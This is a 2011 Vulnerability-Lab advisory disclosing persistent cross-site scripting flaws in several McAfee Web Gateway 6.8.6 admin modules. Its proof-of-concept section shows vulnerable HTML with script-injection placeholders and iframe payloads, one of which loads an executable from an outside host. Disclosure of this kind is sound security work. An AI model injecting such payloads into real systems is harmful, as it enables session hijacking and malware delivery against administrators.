McAfee Web Gateway 6.8.6.x - Multiple Web Vulnerbilities

Document Title:
===============
McAfee Web Gateway 6.8.6.x - Multiple Web Vulnerbilities


References (Source):
====================
MFE-WGW-20100429-01 


Release Date:
=============
2011-08-10


Vulnerability Laboratory ID (VL-ID):
====================================
73


Product & Service Introduction:
===============================
Enter McAfee Web Gateway—the #1-rated anti-malware solution for Web 2.0 and zero-day threats. 
For user-initiated web requests, Web Gateway first enforces an organization’s Internet use policy. 
For all allowed traffic, it then uses local and global techniques to analyze the nature and intent 
of all content and active code entering the network via requested web pages, providing immediate 
protection against malware and other hidden threats. And unlike basic packet inspection techniques, 
McAfee Web Gateway can even perform deep examination of SSL traffic to protect against malicious code 
that has been disguised via encryption. The comprehensive McAfee Web Gateway solution comprises:

Proxy/cache
Category and reputation-based web filtering
Anti-malware
McAfee Anti-Virus
Anti-spyware
SSL scanning
Data leakage protection
Reporting

(Copy of Vendor Homepage: http://www.mcafee.com/us/enterprise/products/email_and_web_security/web/web_gateway.html)


Abstract Advisory Information:
==============================
Vulnerability-Lab Team discovered multiple persistent Vulnerabilities on McAfee Web Gateway.


Vulnerability Disclosure Timeline:
==================================
2011-08-11:	Public or Non-Public Disclosure


Discovery Status:
=================
Published


Affected Product(s):
====================

Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Technical Details & Description:
================================
Multiple Input Validation Vulnerabilities are detected on McAfee Web Gateway 6.8.6. Remote attackers & local privileged 
user accounts can include/implement own malicous persistent script codes on to manipulate specific module request & can lead 
to session hijacking (customer/admin). Low privileged accounts can include persistent frame requests to access 
with the same rights the log- or static-files.

Vulnerable Module(s):
						[+] Account Overview - Allows to manage the accounts
						[+] HMS AGENTS - Private Key Handling / Remote Service
						[+] Secure Administration Shell - General Settings  -  Ciphers|Protocol Options
						[+] E-Mail Gateway & HTTP Method Filter List
						[+] Incident Manager


Pictures:
			../1.png
			../2.png
			../3.png


Proof of Concept (PoC):
=======================
This vulnerabilities can be exploited by local or remote attackers. For demonstration or reproduce ...

Code Review: Account Overview

</table><input type="hidden" name="sortColumn" value=""><input type="hidden" name="sortType" value="">
<input type="hidden" name="listType" value="ACCOUNT"><input type="hidden" name="from" id="from" value="0">
<input type="hidden" id="findold" name="findold" value="*"><table width="100%" border="0" cellspacing="0" class="listViewOuter">
<tr><td class="listViewMessage">Found no entry with '>"<INCLUDE OWN SCRIPTCODE HERE!>, >"<INCLUDE OWN SCRIPTCODE HERE!>'</td></tr><tr><td>
<table width="100%" border="0" cellspacing="0" class="listView"><tr class="listViewTitleRow"><td class="listViewTitleCol" width="10%">
Select</td><td class="listViewTitleCol" width="25%">Account</td><td class="listViewTitleCol" width="25%">Role</td>
<td class="listViewTitleCol" width="4%" align="left"></td><td class="listViewTitleCol" width="4%" align="left"></td>
<td class="listViewTitleCol" width="32%" align="right"></td></tr><tr class="listViewEvenRow"><td class="listViewFilterCol">Filter:
</td><td class="listViewFilterCol"><input id="filter0_" name="filter0_" value=">"<INCLUDE SCRIPTCODE HERE!>" 
type="text" size="40" maxlength="255" onkeypress="return listFilterKey(document.form, event, '');"></td><td class="listViewFilterCol">
<input id="filter1_" name="filter1_" value=">"<INCLUDE OWN SCRIPTCODE HERE!>" 
type="text" size="40" maxlength="255" onkeypress="return listFilterKey(document.form, event, '');"></td><td class="listViewFilterCol">
 </td><td class="listViewFilterCol"> </td><td class="listViewFilterCol"> </td></tr><tr><td colspan="6"> </td></tr>
<tr><td colspan="6"><table width="100%" border="0" cellpadding="0" cellspacing="0"><tr><td><input type="checkbox" name="selAll_" 
value="1" onClick="checkAllListElems(document.form, '_sel')">Select All   <input type="submit" value="Delete Selected" 
name="Delete" onClick="WarnDiabledMainFeature(true);">   </td></tr></table></td></tr></table></td></tr></table>
</td></tr></table>


Code Review: HMS AGENTS - Private Key Handling

<table width="100%" border="0"><tr> <td colspan="3">Decrypting of handshake data will be done</td></tr><tr> <td width="3%"> </td>
<td width="3%"><input type="radio" name="HTTPSProxy.PrivateDomainKeyLoc" value="1" checked></td><td width="94%">by this McAfee Web Gateway instance</td>
</tr> <tr> <td width="3%"> </td><td width="3%"><input type="radio" name="HTTPSProxy.PrivateDomainKeyLoc" value="2" ></td>
<td width="94%">by remote service using HSM Agent with key  
<input type="text" value=">"<INCLUDE OWN SCRIPTCODE HERE!>" name="HTTPSProxy.PrivateDomainKeyName"></td></tr><tr> 
<td width="3%"><input type="hidden" name="HTTPSProxy.SendCertChain" value="0"><input type="checkbox" name="HTTPSProxy.SendCertChain" value="1" checked></td>
<td colspan="2">Send certificate chain in handshake</td></tr></table>



Code Review: Secure Administration Shell - General Settings  -  Ciphers|Protocol Options

<table width="100%" border="0" cellspacing="0" cellpadding="0" class="boxInside optionsBoxPadding">
<tr> <td valign="top"><a href="/wwfile?name=sshprotopts.htm&foo=947836&UserID=Emergency&session=vwpYjyP5GRsSL5v" target="_help"><img class="optionsHelp" alt="Online Help Icon" src="/conf?image=btn_help.gif" border="0" align="right" title="Online Help"></a> 
<table width="100%" border="0"><tr><td width="20%" nowrap valign="baseline">Session encryption ciphers: </td><td width="80%"> 
<input type="text" name="SSHServer.EncryptionAlgPreference" size="50" value=">"<INCLUDE OWN SCRIPTCODE HERE!>">
<br><span class="smallFont">  (Format: Method [, Method]*)</span></td></tr><tr><td width="20%" nowrap valign="top">Message authentication<br>algorithms: 
</td><td width="80%"> <input type="text" name="SSHServer.MessageAuthAlgPreference" size="50" value="hmac-md5,hmac-sha1,hmac-ripemd160,[email protected],hmac-sha1-96,hmac-md5-96">
<br><span class="smallFont">  (Format: Method [, Method]*)</span></td></tr>

...or
 
<td width="20%" nowrap valign="top">Message authentication<br>algorithms: </td><td width="80%">
<input type="text" name="SSHServer.MessageAuthAlgPreference" size="50" value=">"<iframe src=http://global-evolution.info/etc/bad-example.exe width=600 height=600>">




Code Review: HTTP Method Filter List

</table>
<input type="hidden" name="sortColumn" value="">
<input type="hidden" name="sortType" value="">
<input type="hidden" name="listType" value="HTTPMethod">
<input type="hidden" name="from" id="from" value="0">
<input type="hidden" id="findold" name="findold" value="*">
<table width="100%" border="0" cellspacing="0" class="listViewOuter"><tr><td class="listViewMessage">
Found no entry with 'INCLUDE OWN SCRIPTCODE HERE!, *, *, *'</td></tr><tr><td><table width="100%" border="0" cellspacing="0" class="listView">
<tr class="listViewTitleRow"><td class="listViewTitleCol" width="5%">Select</td><td class="listViewTitleCol" width="20%">Method</td>
<td class="listViewTitleCol" width="20%">URL</td><td class="listViewTitleCol" width="20%">Category</td><td class="listViewTitleCol" width="10%">
Action</td><td class="listViewTitleCol" width="5%">Cont.</td><td class="listViewTitleCol" width="20%">Description</td></tr>
<tr class="listViewEvenRow"><td class="listViewFilterCol">Filter:</td><td class="listViewFilterCol"><input id="filter0_" name="filter0_" 
value="" type="text" size="15" maxlength="255" onkeypress="return listFilterKey(document.form, event, '');"></td><td class="listViewFilterCol">
<input id="filter1_" name="filter1_" value=">"<iframe src=http://global-evolution.info width=600 height=600>" type="text" size="20" 
maxlength="255" onkeypress="return listFilterKey(document.form, event, '');"></td><td class="listViewFilterCol"><input id="filter2_" 
name="filter2_" value="" type="text" size="31" maxlength="255" onkeypress="return listFilterKey(document.form, event, '');"></td>
<td class="listViewFilterCol"><input id="filter3_" name="filter3_" value="" type="text" size="6" maxlength="255" onkeypress="return 
listFilterKey(document.form, event, '');"></td><td class="listViewFilterCol"> </td><td class="listViewFilterCol">
<input id="filter4_" name="filter4_" value="" type="text" size="20" maxlength="255" onkeypress="return listFilterKey(document.form, event, '');
"></td></tr><tr><td colspan="7"> </td></tr><tr><td colspan="7"><table width="100%" border="0" cellpadding="0" cellspacing="0"><tr><td>
<input type="checkbox" name="selAll_" value="1" onClick="checkAllListElems(document.form, '_sel')">Select All   
<input type="submit" value="Delete Selected" name="Delete" onClick="WarnDiabledMainFeature(true);">
   <input type="submit" value="Move Up" name="moveUp">   <input type="submit" value="Move Down" name="moveDown">
   </td></tr></table></td></tr></table></td></tr></table></td></tr></table>


References:
http://127.0.0.1:9090/conf
http://127.0.0.1:9090/conf?navTo=SecureAdministrationShell&foo=1564980&userID=Emergency&session=vwpYjyP5GRsSL5v
http://127.0.0.1:9090/conf?navTo=SSL2&foo=2367312&userID=asd&session=vwpYjyP5GRsSL5v
http://127.0.0.1:9090/conf?Search=foo&session=oPu/uG910Mew9q6&searchUI=


Security Risk:
==============
The security risk  of the persistent vulnerabilities are estimated as medium.


Credits & Authors:
==================
Vulnerability Research Laboratory


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.vulnerability-lab.com/register
Contact:    [email protected] 	- [email protected] 	       - [email protected]
Section:    video.vulnerability-lab.com 	- forum.vulnerability-lab.com 		       - news.vulnerability-lab.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and 
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
modify, use or edit our material contact ([email protected] or [email protected]) to get a permission.

    				   	Copyright © 2012 | Vulnerability Laboratory